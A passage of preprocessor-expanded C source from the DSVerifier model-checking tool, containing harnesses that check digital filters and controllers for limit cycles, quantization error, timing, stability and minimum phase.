__DSVERIFIER_assert(X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na);
fxp_t a_fxp[ds.a_size];
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
# 168 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
fxp_t y[X_SIZE_VALUE];
fxp_t x[X_SIZE_VALUE];
fxp_t min_fxp = fxp_double_to_fxp(impl.min);
fxp_t max_fxp = fxp_double_to_fxp(impl.max);
fxp_t xaux[ds.b_size];
int nondet_constant_input = nondet_int();
__DSVERIFIER_assume(nondet_constant_input >= min_fxp && nondet_constant_input <= max_fxp);
for (i = 0; i < X_SIZE_VALUE; ++i) {
x[i] = nondet_constant_input;
y[i] = 0;
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = nondet_constant_input;
}
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
fxp_t yaux[ds.a_size];
fxp_t y0[ds.a_size];
fxp_t waux[Nw];
fxp_t w0[Nw];
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = nondet_int();
__DSVERIFIER_assume(yaux[i] >= min_fxp && yaux[i] <= max_fxp);
y0[i] = yaux[i];
}
# 213 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
fxp_t xk, temp;
fxp_t *aptr, *bptr, *xptr, *yptr, *wptr;
int j;
for(i=0; i<X_SIZE_VALUE; ++i){
shiftL(x[i], xaux, ds.b_size);
y[i] = fxp_direct_form_1(yaux, xaux, a_fxp, b_fxp, ds.a_size, ds.b_size);
shiftL(y[i], yaux, ds.a_size);
# 278 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
}
fxp_check_persistent_limit_cycle(y, X_SIZE_VALUE);
return 0;
}
# 34 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h"
extern digital_system ds;
extern implementation impl;
int verify_error(void){
overflow_mode = 2;
double a_cascade[100];
int a_cascade_size;
double b_cascade[100];
int b_cascade_size;
fxp_t a_fxp[ds.a_size];
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
# 69 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h"
fxp_t min_fxp = fxp_double_to_fxp(impl.min);
fxp_t max_fxp = fxp_double_to_fxp(impl.max);
fxp_t y[X_SIZE_VALUE];
fxp_t x[X_SIZE_VALUE];
double yf[X_SIZE_VALUE];
double xf[X_SIZE_VALUE];
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
fxp_t yaux[ds.a_size];
fxp_t xaux[ds.b_size];
fxp_t waux[Nw];
double yfaux[ds.a_size];
double xfaux[ds.b_size];
double wfaux[Nw];
int i;
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = 0;
yfaux[i] = 0;
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = 0;
xfaux[i] = 0;
}
for (i = 0; i < Nw; ++i) {
waux[i] = 0;
wfaux[i] = 0;
}
for (i = 0; i < X_SIZE_VALUE; ++i) {
y[i] = 0;
x[i] = nondet_int();
__DSVERIFIER_assume(x[i] >= min_fxp && x[i] <= max_fxp);
yf[i] = 0.0f;
xf[i] = fxp_to_double(x[i]);
}
for (i = 0; i < X_SIZE_VALUE; ++i) {
shiftL(x[i], xaux, ds.b_size);
y[i] = fxp_direct_form_1(yaux, xaux, a_fxp, b_fxp, ds.a_size, ds.b_size);
shiftL(y[i], yaux, ds.a_size);
shiftLDouble(xf[i], xfaux, ds.b_size);
yf[i] = double_direct_form_1(yfaux, xfaux, ds.a, ds.b, ds.a_size, ds.b_size);
shiftLDouble(yf[i], yfaux, ds.a_size);
# 169 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h"
double absolute_error = yf[i] - fxp_to_double(y[i]);
__DSVERIFIER_assert(absolute_error < (impl.max_error) && absolute_error > (-impl.max_error));
}
return 0;
}
# 35 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 1
# 13 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
extern digital_system ds;
extern implementation impl;
int verify_zero_input_limit_cycle(void){
overflow_mode = 3;
int i,j;
int Set_xsize_at_least_two_times_Na = 2 * ds.a_size;
printf("X_SIZE must be at least 2 * ds.a_size");
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4
((void) sizeof ((
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4
) ; else __assert_fail (
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
"X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na"
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h", 23, __extension__ __PRETTY_FUNCTION__); }))
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
;
fxp_t a_fxp[ds.a_size];
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
# 71 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
fxp_t min_fxp = fxp_double_to_fxp(impl.min);
fxp_t max_fxp = fxp_double_to_fxp(impl.max);
fxp_t y[X_SIZE_VALUE];
fxp_t x[X_SIZE_VALUE];
for (i = 0; i < X_SIZE_VALUE; ++i) {
y[i] = 0;
x[i] = 0;
}
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
fxp_t yaux[ds.a_size];
fxp_t xaux[ds.b_size];
fxp_t waux[Nw];
fxp_t y0[ds.a_size];
fxp_t w0[Nw];
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = nondet_int();
__DSVERIFIER_assume(yaux[i] >= min_fxp && yaux[i] <= max_fxp);
y0[i] = yaux[i];
}
# 111 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = 0;
}
fxp_t xk, temp;
fxp_t *aptr, *bptr, *xptr, *yptr, *wptr;
for(i=0; i<X_SIZE_VALUE; ++i){
shiftL(x[i], xaux, ds.b_size);
y[i] = fxp_direct_form_1(yaux, xaux, a_fxp, b_fxp, ds.a_size, ds.b_size);
shiftL(y[i], yaux, ds.a_size);
# 188 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
}
fxp_check_persistent_limit_cycle(y, X_SIZE_VALUE);
return 0;
}
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 1
# 16 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
int nondet_int();
float nondet_float();
extern digital_system ds;
extern implementation impl;
extern hardware hw;
int generic_timer = 0;
int verify_generic_timing(void) {
double y[X_SIZE_VALUE];
double x[X_SIZE_VALUE];
int i;
for (i = 0; i < X_SIZE_VALUE; ++i) {
y[i] = 0;
x[i] = nondet_float();
__DSVERIFIER_assume(x[i] >= impl.min && x[i] <= impl.max);
}
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
double yaux[ds.a_size];
double xaux[ds.b_size];
double waux[Nw];
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = 0;
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = 0;
}
for (i = 0; i < Nw; ++i) {
waux[i] = 0;
}
double xk, temp;
double *aptr, *bptr, *xptr, *yptr, *wptr;
int j;
generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
double initial_timer = generic_timer;
for (i = 0; i < X_SIZE_VALUE; ++i) {
generic_timer += ((2 * hw.assembly.ldd) + (1 * hw.assembly.adiw) + (2 * hw.assembly.std));
generic_timer += ((2 * hw.assembly.ldd) + (1 * hw.assembly.cpi) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brlt));
generic_timing_shift_l_double(x[i], xaux, ds.b_size);
y[i] = generic_timing_double_direct_form_1(yaux, xaux, ds.a, ds.b, ds.a_size, ds.b_size);
generic_timing_shift_l_double(y[i], yaux, ds.a_size);
# 88 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
double spent_time = (((double) generic_timer) * hw.cycle);
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4
((void) sizeof ((
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
spent_time <= ds.sample_time
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
spent_time <= ds.sample_time
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4
) ; else __assert_fail (
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
"spent_time <= ds.sample_time"
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h", 89, __extension__ __PRETTY_FUNCTION__); }))
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
;
generic_timer = initial_timer;
}
return 0;
}
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_timing_msp430.h" 1
# 16 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_timing_msp430.h"
int nondet_int();
float nondet_float();
extern digital_system ds;
extern implementation impl;
int verify_timing_msp_430(void) {
double y[X_SIZE_VALUE];
double x[X_SIZE_VALUE];
int i;
for (i = 0; i < X_SIZE_VALUE; ++i) {
y[i] = 0;
x[i] = nondet_float();
__DSVERIFIER_assume(x[i] >= impl.min && x[i] <= impl.max);
}
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
double yaux[ds.a_size];
double xaux[ds.b_size];
double waux[Nw];
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = 0;
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = 0;
}
for (i = 0; i < Nw; ++i) {
waux[i] = 0;
}
double xk, temp;
double *aptr, *bptr, *xptr, *yptr, *wptr;
int j;
for (i = 0; i < X_SIZE_VALUE; ++i) {
shiftL(x[i], xaux, ds.b_size);
y[i] = double_direct_form_1_MSP430(yaux, xaux, ds.a, ds.b, ds.a_size, ds.b_size);
shiftL(y[i], yaux, ds.a_size);
# 121 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_timing_msp430.h"
}
return 0;
}
# 38 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 1
# 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
extern digital_system ds;
extern implementation impl;
int verify_stability(void){
overflow_mode = 0;
fxp_t a_fxp[ds.a_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
double _a[ds.a_size];
fxp_to_double_array(_a, a_fxp, ds.a_size);
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4
((void) sizeof ((
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
check_stability(_a, ds.a_size)
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
check_stability(_a, ds.a_size)
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4
) ; else __assert_fail (
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
"check_stability(_a, ds.a_size)"
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h", 37, __extension__ __PRETTY_FUNCTION__); }))
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
;
# 83 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
return 0;
}
# 39 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_minimum_phase.h" 1
# 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_minimum_phase.h"
extern digital_system ds;
extern implementation impl;
int verify_minimum_phase(void){
overflow_mode = 0;
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
double _b[ds.b_size];
fxp_to_double_array(_b, b_fxp, ds.b_size);
__DSVERIFIER_assert(check_stability(_b, ds.b_size));
# 85 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_minimum_phase.h"
return 0;
}
# 40 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability_closedloop.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability_closedloop.h"
extern digital_system plant;
extern digital_system plant_cbmc;
extern digital_system controller;
int verify_stability_closedloop_using_dslib(void){
double * c_num = controller.b;
int c_num_size = controller.b_size;
double * c_den = controller.a;
int c_den_size = controller.a_size;
fxp_t c_num_fxp[controller.b_size];
fxp_double_to_fxp_array(c_num, c_num_fxp, controller.b_size);
fxp_t c_den_fxp[controller.a_size];
fxp_double_to_fxp_array(c_den, c_den_fxp, controller.a_size);
double c_num_qtz[controller.b_size];
fxp_to_double_array(c_num_qtz, c_num_fxp, controller.b_size);
double c_den_qtz[controller.a_size];
fxp_to_double_array(c_den_qtz, c_den_fxp, controller.a_size);
double * p_num = plant.b;
int p_num_size = plant.b_size;
double * p_den = plant.a;
int p_den_size = plant.a_size;
double ans_num[100];
int ans_num_size = controller.b_size + plant.b_size - 1;
double ans_den[100];
int ans_den_size = controller.a_size + plant.a_size - 1;
# 68 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability_closedloop.h"
printf("Verifying stability for closedloop function\n");
__DSVERIFIER_assert(check_stability_closedloop(ans_den, ans_den_size, p_num, p_num_size, p_den, p_den_size));
return 0;
}
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h" 1
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h"
extern digital_system plant;
extern digital_system plant_cbmc;
extern digital_system controller;
double nondet_double();
int verify_limit_cycle_closed_loop(void){
overflow_mode = 3;
double * c_num = controller.b;
int c_num_size = controller.b_size;
double * c_den = controller.a;
int c_den_size = controller.a_size;
fxp_t c_num_fxp[controller.b_size];
fxp_double_to_fxp_array(c_num, c_num_fxp, controller.b_size);
fxp_t c_den_fxp[controller.a_size];
fxp_double_to_fxp_array(c_den, c_den_fxp, controller.a_size);
double c_num_qtz[controller.b_size];
fxp_to_double_array(c_num_qtz, c_num_fxp, controller.b_size);
double c_den_qtz[controller.a_size];
fxp_to_double_array(c_den_qtz, c_den_fxp, controller.a_size);
double * p_num = plant.b;
int p_num_size = plant.b_size;
double * p_den = plant.a;
int p_den_size = plant.a_size;
double ans_num[100];
int ans_num_size = controller.b_size + plant.b_size - 1;
double ans_den[100];
int ans_den_size = controller.a_size + plant.a_size - 1;
int i;
double y[X_SIZE_VALUE];
double x[X_SIZE_VALUE];
double xaux[ans_num_size];
double nondet_constant_input = nondet_double();
__DSVERIFIER_assume(nondet_constant_input >= impl.min && nondet_constant_input <= impl.max);
for (i = 0; i < X_SIZE_VALUE; ++i) {
x[i] = nondet_constant_input;
y[i] = 0;
}
for (i = 0; i < ans_num_size; ++i) {
xaux[i] = nondet_constant_input;
}
double yaux[ans_den_size];
double y0[ans_den_size];
int Nw = ans_den_size > ans_num_size ? ans_den_size : ans_num_size;
double waux[Nw];
double w0[Nw];
for (i = 0; i < ans_den_size; ++i) {
yaux[i] = nondet_int();
__DSVERIFIER_assume(yaux[i] >= impl.min && yaux[i] <= impl.max);
y0[i] = yaux[i];
}
# 112 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h"
double xk, temp;
double *aptr, *bptr, *xptr, *yptr, *wptr;
int j;
for(i=0; i<X_SIZE_VALUE; ++i){
shiftLDouble(x[i], xaux, ans_num_size);
y[i] = double_direct_form_1(yaux, xaux, ans_den, ans_num, ans_den_size, ans_num_size);
shiftLDouble(y[i], yaux, ans_den_size);
# 137 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h"
}
double_check_persistent_limit_cycle(y, X_SIZE_VALUE);
return 0;
}
# 42 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h" 1
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h"
extern digital_system plant;
extern digital_system plant_cbmc;
extern digital_system controller;
int verify_error_closedloop(void){
overflow_mode = 3;
double * c_num = controller.b;
int c_num_size = controller.b_size;
double * c_den = controller.a;
int c_den_size = controller.a_size;
fxp_t c_num_fxp[controller.b_size];
fxp_double_to_fxp_array(c_num, c_num_fxp, controller.b_size);
fxp_t c_den_fxp[controller.a_size];
fxp_double_to_fxp_array(c_den, c_den_fxp, controller.a_size);
double c_num_qtz[controller.b_size];
fxp_to_double_array(c_num_qtz, c_num_fxp, controller.b_size);
double c_den_qtz[controller.a_size];
fxp_to_double_array(c_den_qtz, c_den_fxp, controller.a_size);
double * p_num = plant.b;
int p_num_size = plant.b_size;
double * p_den = plant.a;
int p_den_size = plant.a_size;
double ans_num_double[100];
double ans_num_qtz[100];
int ans_num_size = controller.b_size + plant.b_size - 1;
double ans_den_qtz[100];
double ans_den_double[100];
int ans_den_size = controller.a_size + plant.a_size - 1;
# 77 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h"
int i;
double y_qtz[X_SIZE_VALUE];
double y_double[X_SIZE_VALUE];
double x_qtz[X_SIZE_VALUE];
double x_double[X_SIZE_VALUE];
double xaux_qtz[ans_num_size];
double xaux_double[ans_num_size];
double xaux[ans_num_size];
double nondet_constant_input = nondet_double();
__DSVERIFIER_assume(nondet_constant_input >= impl.min && nondet_constant_input <= impl.max);
for (i = 0; i < X_SIZE_VALUE; ++i) {
x_qtz[i] = nondet_constant_input;
x_double[i] = nondet_constant_input;
y_qtz[i] = 0;
y_double[i] = 0;
}
for (i = 0; i < ans_num_size; ++i) {
xaux_qtz[i] = nondet_constant_input;
xaux_double[i] = nondet_constant_input;
}
double yaux_qtz[ans_den_size];
double yaux_double[ans_den_size];
double y0_qtz[ans_den_size];
double y0_double[ans_den_size];
int Nw = ans_den_size > ans_num_size ? ans_den_size : ans_num_size;
double waux_qtz[Nw];
double waux_double[Nw];
double w0_qtz[Nw];
double w0_double[Nw];
for (i = 0; i < ans_den_size; ++i) {
yaux_qtz[i] = 0;
yaux_double[i] = 0;
}
for(i=0; i<X_SIZE_VALUE; ++i){
shiftLDouble(x_qtz[i], xaux_qtz, ans_num_size);
y_qtz[i] = double_direct_form_1(yaux_qtz, xaux_qtz, ans_den_qtz, ans_num_qtz, ans_den_size, ans_num_size);
shiftLDouble(y_qtz[i], yaux_qtz, ans_den_size);
shiftLDouble(x_double[i], xaux_double, ans_num_size);
y_double[i] = double_direct_form_1(yaux_double, xaux_double, ans_den_double, ans_num_double, ans_den_size, ans_num_size);
shiftLDouble(y_double[i], yaux_double, ans_den_size);
# 156 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h"
double absolute_error = y_double[i] - fxp_to_double(y_qtz[i]);
__DSVERIFIER_assert(absolute_error < (impl.max_error) && absolute_error > (-impl.max_error));
}
return 0;
}
# 43 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 1
# 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
extern digital_system_state_space _controller;
extern double error_limit;
extern int closed_loop;
double new_state[4][4];
double new_stateFWL[4][4];
digital_system_state_space _controller_fxp;
digital_system_state_space _controller_double;
double ss_system_quantization_error(fxp_t inputs){
digital_system_state_space __backupController;
int i;
int j;
_controller.inputs[0][0] = inputs;
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
__backupController.A[i][j]= (_controller.A[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nInputs;j++){
__backupController.B[i][j]= (_controller.B[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nStates;j++){
__backupController.C[i][j]= (_controller.C[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
__backupController.D[i][j]= (_controller.D[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
__backupController.states[i][j]= (_controller.states[i][j]);
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<1;j++){
__backupController.inputs[i][j]= (_controller.inputs[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<1;j++){
__backupController.outputs[i][j]= (_controller.outputs[i][j]);
}
}
double __quant_error = 0.0;
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
_controller.states[i][j]= (new_state[i][j]);
}
}
double output_double = double_state_space_representation();
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
new_state[i][j]= (_controller.states[i][j]);
}
}
__backupController.inputs[0][0] = inputs;
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
_controller.A[i][j] = __backupController.A[i][j];
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nInputs;j++){
_controller.B[i][j] = __backupController.B[i][j];
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nStates;j++){
_controller.C[i][j] = __backupController.C[i][j];
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
_controller.D[i][j] = __backupController.D[i][j];
}
}
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
_controller.states[i][j] = __backupController.states[i][j];
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<1;j++){
_controller.inputs[i][j] = __backupController.inputs[i][j];
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<1;j++){
_controller.outputs[i][j] = __backupController.outputs[i][j];
}
}
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
_controller.states[i][j]= (new_stateFWL[i][j]);
}
}
double output_fxp = fxp_state_space_representation();
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
new_stateFWL[i][j]= (_controller.states[i][j]);
}
}
__quant_error = output_double - output_fxp;
return __quant_error;
}
double fxp_ss_closed_loop_quantization_error(double reference){
double reference_aux[4][4];
double result1[4][4];
double temp_result1[4][4];
double result2[4][4];
double temp_states[4][4];
fxp_t K_fxp[4][4];
fxp_t states_fxp[4][4];
fxp_t result_fxp[4][4];
unsigned int i;
unsigned int j;
unsigned int k;
short unsigned int flag = 0;
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
if(_controller_fxp.D[i][j] != 0){
flag = 1;
}
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
reference_aux[i][j]=0;
K_fxp[i][j] = 0;
}
}
for(i=0; i<nInputs;i++){
reference_aux[i][0]= reference;
}
for(i=0; i<4;i++){
states_fxp[i][0]=0;
}
for(i=0; i<nStates;i++){
K_fxp[0][i]= fxp_double_to_fxp(_controller_fxp.K[0][i]);
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
}
}
for(k=0; k<nStates;k++)
{
states_fxp[k][0]= fxp_double_to_fxp(_controller_fxp.states[k][0]);
}
fxp_matrix_multiplication(nOutputs,nStates,nStates,1,K_fxp,states_fxp,result_fxp);
fxp_t reference_fxp[4][4];
fxp_t result_fxp2[4][4];
for(k=0;k<nInputs;k++)
{
reference_fxp[k][0] =fxp_double_to_fxp(fxp_quantize(reference_aux[k][0]));
}
fxp_sub_matrix(nInputs,1, reference_fxp, result_fxp, result_fxp2);
for(k=0; k<nInputs;k++)
{
_controller_fxp.inputs[k][0] = fxp_to_double(fxp_quantize(result_fxp2[k][0]));
}
